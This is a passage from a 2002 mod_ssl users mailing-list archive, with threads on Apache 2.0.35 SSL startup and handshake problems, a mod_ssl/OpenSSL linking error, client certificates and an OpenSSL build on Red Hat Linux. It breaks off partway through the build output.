Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 12:23:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA21390; Wed, 17 Apr 2002 12:22:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id MAA21356; Wed, 17 Apr 2002 12:21:38 +0200 (MET DST) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C0436A@mail.rainbow.com> From: Lynn Gazis To: "'Geoff Thorpe'" , modssl-users@modssl.org Cc: Lynn Gazis Subject: RE: Apache 2.0.35 with SSL - wont start Date: Tue, 16 Apr 2002 09:16:22 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lynn Gazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users s_client doesn't handshake OK with it, Rainbow's show test program doesn't handshake OK with it, and swamp doesn't handshake OK with it. I've been wondering what load testing program *does* handshake properly with Apache 2.0 (I really need to be able to test it, somehow, under load, and so far I've only been able to make single connections from IE and Netscape). Maybe your suggestion is right, and it doesn't like the "GET /\r/\n\r\n" request string; I suppose that could explain why several different programs would be able to send traffic to Apache 1.3 and not to Apache 2.0. Lynn Gazis -----Original Message----- From: Geoff Thorpe [mailto:geoff@geoffthorpe.net] Sent: Monday, April 15, 2002 6:57 PM To: modssl-users@modssl.org Cc: Lynn Gazis Subject: Re: Apache 2.0.35 with SSL - wont start Hi Lynn, Not having the time to deal with 2.0.** right now, I haven't been keeping an eye on how swamp is finding it. In principle however, swamp's satisfaction with Apache 2.0 should be roughly equivalent to that of "openssl s_client". However, if Apache 2.0 itself doesn't like the "GET /\r/\n\r\n" request string, that might explain a termination or something - but again, you could verify that using s_client. Does s_client handshake OK with it? If all else fails, please contact me off the list and I'll send some ideas about how to trace this. Cheers, Geoff On Tuesday 16 April 2002 04:06, you wrote: > I got that as well; I found that, while with Apache 1.3 I only needed to > set ServerName in httpd.conf, in Apache 2.0 I needed also to edit both > httpd.conf and ssl.conf and change the "0.0.0.0" in both files to my > system's real IP address (and, since I didn't care to test as root, change > the port numbers to 8080 and 8443). > > I still haven't figured out why I can connect with IE but get nothing but > errors from swamp, though (I can use swamp just fine with Apache 1.3). > > Lynn Gazis > > -----Original Message----- > From: paul priestman [mailto:primo1980@hotmail.com] > Sent: Monday, April 15, 2002 5:59 AM > To: modssl-users@modssl.org > Subject: Apache 2.0.35 with SSL - wont start > > > Hello all, > > I have downloaded and installed Apache 2.0.35 with SSL. I have configured > the httpd.conf as they suggest in ssl.conf. However, when i try to start > apachectl i get the following message: > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > no listening sockets available, shutting down > ./apachectl startssl: httpd could not be started > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > working with apache 1.3.22. > > Thanks for your time > > Paul > > _________________________________________________________________ > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 14:43:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA29392; Wed, 17 Apr 2002 14:42:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta4-rme.xtra.co.nz id OAA29369; Wed, 17 Apr 2002 14:41:38 +0200 (MET DST) Received: from there ([210.86.52.245]) by mta4-rme.xtra.co.nz with SMTP id <20020417124130.UHMQ20652.mta4-rme.xtra.co.nz@there>; Thu, 18 Apr 2002 00:41:30 +1200 Content-Type: text/plain; charset="iso-8859-1" From: Geoff Thorpe To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start Date: Thu, 18 Apr 2002 01:42:03 +1200 X-Mailer: KMail [version 1.3.1] Cc: Lynn Gazis References: <5606C687D4C7D5119A5800508BF30DB401C0436A@mail.rainbow.com> In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C0436A@mail.rainbow.com> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020417124130.UHMQ20652.mta4-rme.xtra.co.nz@there> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Geoff Thorpe X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, On Wednesday 17 April 2002 04:16, Lynn Gazis wrote: > s_client doesn't handshake OK with it, Rainbow's show test program doesn't > handshake OK with it, and swamp doesn't handshake OK with it. I've been > wondering what load testing program *does* handshake properly with Apache > 2.0 (I really need to be able to test it, somehow, under load, and so far > I've only been able to make single connections from IE and Netscape). Ah, well then it would appear to be SSL/TLS weirdness with Apache 2.0. > Maybe your suggestion is right, and it doesn't like the "GET /\r/\n\r\n" > request string; I suppose that could explain why several different programs > would be able to send traffic to Apache 1.3 and not to Apache 2.0. If you can't get s_client to handshake with Apache 2, then it is rather irrelevant what request string you send through the SSL stream. It requires an SSL/TLS stream to be open to begin with. Quite weird really ... It's hard to tell right off the bat what this could be - but it sounds weird as I'm sure *someone* working on the SSL functionality in apache 2.0 must have tried hitting it with *something* built around openssl. How about konqueror, lynx, or some other browser whose SSL support comes from openssl? Otherwise, I think it would require a comment from someone dealing with Apache 2.0 - there seemed to be one or two people saying it was ready for production and that it was now time for the 1.3->2.0 switch ... surely one of these could clarify the situation? :-) Cheers, Geoff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 15:34:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA02281; Wed, 17 Apr 2002 15:33:58 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id PAA02229; Wed, 17 Apr 2002 15:32:14 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 17 Apr 2002 06:30:54 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 17 Apr 2002 13:30:53 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: modssl-users@modssl.org Subject: Problems with Apache 2.0.35 and SSL Date: Wed, 17 Apr 2002 13:30:53 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 17 Apr 2002 13:30:54.0283 (UTC) FILETIME=[196469B0:01C1E614] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I have two questions/problems that may be bugs or just my error - hope you can help 1. I have managed to install Apache 2.0.35 with mod SSL but it ony works when i sepecify the servername as been the servers IP address instead of the actual name - is this a bug or is this the way Apache in tended? 2. I have now decided to install Apache 2.0.35 with mod ssl as a DSO module as it seems to be unstable and I may not wish to load this module into the server. All the other modules are compiled in to the apache kernel. My configuration was thus: ./configure --prefix=/path/to/apache \ --enable-so \ --enable-ssl=shared \ --with-ssl=/path/to/openssl this compiled ok and it installed ok. However, when i try to start the server i get the following error message: Cannot load /opt/local/apache/apache_2.0.35/modules/mod_ssl.so into server: ld.so.1: /opt/local/apache/apache_2.0.35/bin/httpd: fatal: relocation error: file /opt/local/apache/apache_2.0.35/modules/mod_ssl.so: symbol X509_INFO_free: referenced symbol not found Is this a common bug? Paul _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 16:48:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA06253; Wed, 17 Apr 2002 16:46:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bacardi.fiwc.navy.mil id QAA06219; Wed, 17 Apr 2002 16:45:42 +0200 (MET DST) Received: by bacardi.fiwc.navy.mil; id PAA08256; Wed, 17 Apr 2002 15:34:12 GMT Received: from unknown(204.37.13.47) by bacardi.fiwc.navy.mil via smap (V5.5) id xma008230; Wed, 17 Apr 02 15:33:41 GMT content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: Trouble with mod_ssl and mod_speling X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Date: Wed, 17 Apr 2002 10:47:23 -0400 Message-ID: <84431D6C40F14941BB4D7007339E691D0B9B26@mail370.AD.FIWC.NAVY.MIL> Thread-Topic: No solution for bug with IE on Mac? Thread-Index: AcHVmC6r8iHYaWrURC2Fllw7Usq26QQhl2ZA From: "Frye, David" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA06249 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Frye, David" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am tring to get mod_speling working on port 442. It works find as long as someone comes in from port 80. I also have a rewrite rule on some directories that force https. Are the two conflicting? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 18:57:39 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA16133; Wed, 17 Apr 2002 18:57:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.cmpnet.com id SAA16038; Wed, 17 Apr 2002 18:56:16 +0200 (MET DST) Received: from cmpnet.com (gw58-250.cmp.com [192.155.58.250]) (authenticated bits=0) by mail1.cmpnet.com (8.12.1/8.12.0) with ESMTP id g3HGuD30029475 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NO) for ; Wed, 17 Apr 2002 09:56:14 -0700 (PDT) Message-ID: <3CBDA927.4060006@cmpnet.com> Date: Wed, 17 Apr 2002 12:56:07 -0400 From: Jason Buchanan User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problems with Apache 2.0.35 and SSL References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jason Buchanan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users if you're building this in Solaris, you need the Sun ld that is in /usr/ccs/bin - NOT the GCC ld. GCC ld will not build binaries that run DSO Apache ;-) later... jsb paul priestman wrote: > > Hello, > > I have two questions/problems that may be bugs or just my error - hope > you can help > > 1. I have managed to install Apache 2.0.35 with mod SSL but it ony > works when i sepecify the servername as been the servers IP address > instead of the actual name - is this a bug or is this the way Apache > in tended? > > 2. I have now decided to install Apache 2.0.35 with mod ssl as a DSO > module as it seems to be unstable and I may not wish to load this > module into the server. All the other modules are compiled in to the > apache kernel. My configuration was thus: > ./configure --prefix=/path/to/apache \ > --enable-so \ > --enable-ssl=shared \ > --with-ssl=/path/to/openssl > > this compiled ok and it installed ok. However, when i try to start > the server i get the following error message: > > Cannot load /opt/local/apache/apache_2.0.35/modules/mod_ssl.so into > server: ld.so.1: /opt/local/apache/apache_2.0.35/bin/httpd: fatal: > relocation error: file > /opt/local/apache/apache_2.0.35/modules/mod_ssl.so: symbol > X509_INFO_free: referenced symbol not found > > Is this a common bug? > > Paul > > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 19:40:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA19985; Wed, 17 Apr 2002 19:39:20 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA19866; Wed, 17 Apr 2002 19:37:44 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3HHZxK20160 for ; Wed, 17 Apr 2002 13:35:59 -0400 Date: Wed, 17 Apr 2002 13:35:59 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Problems with Apache 2.0.35 and SSL In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 17 Apr 2002, paul priestman wrote: > 1. I have managed to install Apache 2.0.35 with mod SSL but it ony works > when i sepecify the servername as been the servers IP address instead of the > actual name - is this a bug or is this the way Apache in tended? Do you mean in the actual ServerName directive? No that's not intended, but I've also never seen this problem. Can you email me a configuration snippet that demonstrates the problem? > Cannot load /opt/local/apache/apache_2.0.35/modules/mod_ssl.so into server: > ld.so.1: /opt/local/apache/apache_2.0.35/bin/httpd: fatal: relocation error: > file /opt/local/apache/apache_2.0.35/modules/mod_ssl.so: symbol > X509_INFO_free: referenced symbol not found > > Is this a common bug? Yes, it's a fairly frequently asked question. The problem is that you've built a shared mod_ssl against a static OpenSSL (ie, libssl.a and libcrypto.a instead of .so). That won't work because the way the build system currently works, OpenSSL is linked into httpd, not mod_ssl. httpd doesn't need the symbols from the OpenSSL libraries, so the static linker throws them away, meaning they're no longer available when mod_ssl is dynamically linked at runtime. Solution: use a shared OpenSSL. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 22:00:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA23026; Wed, 17 Apr 2002 20:16:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id UAA22937; Wed, 17 Apr 2002 20:15:01 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA07652; Wed, 17 Apr 2002 13:19:48 -0400 Date: Wed, 17 Apr 2002 13:19:48 -0400 (EDT) From: "R. DuFresne" To: paul priestman cc: modssl-users@modssl.org Subject: Re: Problems with Apache 2.0.35 and SSL In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I think Owen mentioned a week ago or so that ssl also has to be compiled as 'shared' for this to work, else there are problems. Thanks, Ron DuFresne On Wed, 17 Apr 2002, paul priestman wrote: > > Hello, > > I have two questions/problems that may be bugs or just my error - hope you > can help > > 1. I have managed to install Apache 2.0.35 with mod SSL but it ony works > when i sepecify the servername as been the servers IP address instead of the > actual name - is this a bug or is this the way Apache in tended? > > 2. I have now decided to install Apache 2.0.35 with mod ssl as a DSO module > as it seems to be unstable and I may not wish to load this module into the > server. All the other modules are compiled in to the apache kernel. My > configuration was thus: > ./configure --prefix=/path/to/apache \ > --enable-so \ > --enable-ssl=shared \ > --with-ssl=/path/to/openssl > > this compiled ok and it installed ok. However, when i try to start the > server i get the following error message: > > Cannot load /opt/local/apache/apache_2.0.35/modules/mod_ssl.so into server: > ld.so.1: /opt/local/apache/apache_2.0.35/bin/httpd: fatal: relocation error: > file /opt/local/apache/apache_2.0.35/modules/mod_ssl.so: symbol > X509_INFO_free: referenced symbol not found > > Is this a common bug? > > Paul > > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 01:58:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA21929; Thu, 18 Apr 2002 01:57:32 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web11904.mail.yahoo.com id BAA21886; Thu, 18 Apr 2002 01:56:23 +0200 (MET DST) Message-ID: <20020417235620.12622.qmail@web11904.mail.yahoo.com> Received: from [194.117.133.118] by web11904.mail.yahoo.com via HTTP; Wed, 17 Apr 2002 16:56:20 PDT Date: Wed, 17 Apr 2002 16:56:20 -0700 (PDT) From: Syed Sadiqur Rahman Subject: SSL/TLS-aware Apache To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1488447196-1019087780=:10080" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Syed Sadiqur Rahman X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --0-1488447196-1019087780=:10080 Content-Type: text/plain; charset=us-ascii Hello! I've installed the apache on my computer running windows 2000 Now I'm trying to implement SSL with Apache. i.e. I want to use https instead of http. I've done so far is when I type "http:\\localhost" in the browser I see an HTML file that says: Hey, it worked ! The SSL/TLS-aware Apache webserver was successfully installed on this website. ............ But If I type https instead of http it doest work. What can I now ? I'm using modssl + openssl. Could you please suggest me ? Sadiq --------------------------------- Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax --0-1488447196-1019087780=:10080 Content-Type: text/html; charset=us-ascii

Hello!

I've installed the apache on my computer running windows 2000

Now I'm trying to implement SSL with Apache. i.e. I want to use https instead of http.

I've done so far is when I type "http:\\localhost"  in the browser I see an HTML file that says:

Hey, it worked !
The SSL/TLS-aware Apache webserver was
successfully installed on this website.
............

But If I type https instead of http it doest work. What can I now  ?

I'm using modssl + openssl.
Could you please suggest me ?

Sadiq


Do You Yahoo!?
Yahoo! Tax Center - online filing with TurboTax --0-1488447196-1019087780=:10080-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 10:17:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA26753; Thu, 18 Apr 2002 10:16:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA26717; Thu, 18 Apr 2002 10:15:12 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA28253 for ; Thu, 18 Apr 2002 10:15:05 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma028247; Thu, 18 Apr 02 10:15:00 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA12711 for ; Thu, 18 Apr 2002 10:14:59 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA11561 for ; Thu, 18 Apr 2002 10:14:57 +0200 (MEST) Message-ID: <3CBE8081.BC8E5515@bourse.ch> Date: Thu, 18 Apr 2002 10:14:57 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: SSL/TLS-aware Apache References: <20020417235620.12622.qmail@web11904.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Syed Sadiqur Rahman wrote: > > Hello! > > I've installed the apache on my computer running windows 2000 > > Now I'm trying to implement SSL with Apache. i.e. I want to use https > instead of http. > > I've done so far is when I type "http:\\localhost" in the browser I > see an HTML file that says: > > Hey, it worked ! > The SSL/TLS-aware Apache webserver was > successfully installed on this website. > ............ > > But If I type https instead of http it doest work. What can I now ? By default, a newly installed apache has a single virtualhost on port 80 which contains the "Hey it worked!" page and all the documentation. HTTPS uses port 443 by default - check you have a "Listen 443" or "Port 443" directive in your config file It also sounds like you haven't created any content yet. At the very least, you need to create an SSL virtualhost (i.e. some webpages behind the SSL port, 443). Follow the link on the "Hey it worked!" page into the documentation and read about VirtualHosts. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 10:19:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA26923; Thu, 18 Apr 2002 10:18:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web14005.mail.yahoo.com id KAA26821; Thu, 18 Apr 2002 10:17:08 +0200 (MET DST) Message-ID: <20020418081707.88658.qmail@web14005.mail.yahoo.com> Received: from [164.100.220.94] by web14005.mail.yahoo.com via HTTP; Thu, 18 Apr 2002 01:17:07 PDT Date: Thu, 18 Apr 2002 01:17:07 -0700 (PDT) From: kumarselva Subject: Client certificate not recognised...- reg... To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: kumarselva X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I installed client certificate but the server says client doesnot have client certificate. I made mandotary (client cert. needed) in IIS. Both the certificates are generated through stanalone CA in Windows 2000 server. I even connected mod-ssl test site which says client certificate filed is empty. How to install properly the client certificate. How to check whether it is installed properly in IE. - Selva __________________________________________________ Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax http://taxes.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 10:35:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA27945; Thu, 18 Apr 2002 10:34:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from eprotea.com.my id KAA27916; Thu, 18 Apr 2002 10:33:08 +0200 (MET DST) Received: from there (zan [192.168.2.127]) by eprotea.com.my (8.9.3/8.9.3) with SMTP id QAA27420 for ; Thu, 18 Apr 2002 16:32:51 +0800 Message-Id: <200204180832.QAA27420@eprotea.com.my> Content-Type: text/plain; charset="iso-8859-1" From: "M.Hanizan" To: modssl-users@modssl.org Subject: Re: Client certificate not recognised...- reg... Date: Thu, 18 Apr 2002 16:36:59 +0800 X-Mailer: KMail [version 1.3.1] References: <20020418081707.88658.qmail@web14005.mail.yahoo.com> In-Reply-To: <20020418081707.88658.qmail@web14005.mail.yahoo.com> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "M.Hanizan" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Try modify the httpd.conf file. Add a line of SSLVerifyClient require In my machine the file is locate at /usr/local/apache/conf/. In your machine the file location depend on where you set the apache path. Regard... :) M.Hanizan On Thursday 18 April 2002 04:17 pm, you wrote: > Hi > > I installed client certificate but the server says > client doesnot have client certificate. I made > mandotary (client cert. needed) in IIS. Both the > certificates are generated through stanalone CA in > Windows 2000 server. I even connected mod-ssl test > site which says client certificate filed is empty. > > How to install properly the client certificate. How to > check whether it is installed properly in IE. > > > - Selva > > > > __________________________________________________ > Do You Yahoo!? > Yahoo! Tax Center - online filing with TurboTax > http://taxes.yahoo.com/ > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 15:08:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA15303; Thu, 18 Apr 2002 15:07:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from omta02.mta.everyone.net id PAA15274; Thu, 18 Apr 2002 15:06:10 +0200 (MET DST) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta02.mta.everyone.net (Postfix) with ESMTP id 9719B1C3E52 for ; Thu, 18 Apr 2002 06:06:08 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 4988136F9; Thu, 18 Apr 2002 06:06:08 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Thu, 18 Apr 2002 06:06:07 -0700 (PDT) From: Nisarg Rav To: modssl-users@modssl.org Subject: Urgent help needed Regarding installation of openssl-0.9.6b on Redhat linux 7.1 X-Originating-Ip: [203.88.129.229] Message-Id: <20020418130608.4988136F9@sitemail.everyone.net> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nisarg Rav X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello gurus , I'm facing one typical problem while configuring openssl-0.9.6b on RedHat linux 7.1 , kernel 2.4.2-2. I have successfully configured and installed openssl-0.9.6b, mod_ssl-2.8.7-1.1.3.23 and Apache_1.3.23 on Redhat linux 7.2 , kernel 2.4.7-10. It is also working properly. This installation i did with local access of servef. Now i need to configure and install all these things remotely on one linux box with telnet access. This linux box is RHL 7.1 and 2.4.2-2. Now while doing ./config or ./Configure linux-elf on it it is giving problem. First of all for major of files it is saying that [File Exists] .. [root@abcd openssl-0.9.6b]# ./config Operating system: i686-whatever-linux2 Configuring for linux-elf Configuring for linux-elf IsWindows=0 CC =gcc CFLAG =-fPIC -DTHREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDIAN -DTERMIO -O3 -fomit-frame-pointer -m486 -Wall -DSHA1_ASM -DMD5_ASM -DRMD160_ASM EX_LIBS =-ldl BN_ASM =asm/bn86-elf.o asm/co86-elf.o DES_ENC =asm/dx86-elf.o asm/yx86-elf.o BF_ENC =asm/bx86-elf.o CAST_ENC =asm/cx86-elf.o RC4_ENC =asm/rx86-elf.o RC5_ENC =asm/r586-elf.o MD5_OBJ_ASM =asm/mx86-elf.o SHA1_OBJ_ASM =asm/sx86-elf.o RMD160_OBJ_ASM=asm/rm86-elf.o PROCESSOR = RANLIB =/usr/bin/ranlib PERL =/usr/bin/perl THIRTY_TWO_BIT mode DES_PTR used DES_RISC1 used DES_UNROLL used BN_LLONG mode RC4_INDEX mode RC4_CHUNK is undefined Makefile => Makefile.ssl e_os.h => include/openssl/e_os.h [File exists] e_os2.h => include/openssl/e_os2.h [File exists] making links in crypto... make[1]: Entering directory `/usr/local/openssl-0.9.6b/crypto' Makefile => Makefile.ssl crypto.h => ../include/openssl/crypto.h [File exists] tmdiff.h => ../include/openssl/tmdiff.h [File exists] opensslv.h => ../include/openssl/opensslv.h [File exists] opensslconf.h => ../include/openssl/opensslconf.h [File exists] ebcdic.h => ../include/openssl/ebcdic.h [File exists] symhacks.h => ../include/openssl/symhacks.h [File exists] Makefile => Makefile.ssl making links in crypto/md2... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/md2' Makefile => Makefile.ssl md2.h => ../../include/openssl/md2.h [File exists] md2test.c => ../../test/md2test.c [File exists] make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/md2' making links in crypto/md4... make[2]: Entering directory `/usr/local/openssl-0.9.6b/crypto/md4' Makefile => Makefile.ssl md4.h => ../../include/openssl/md4.h 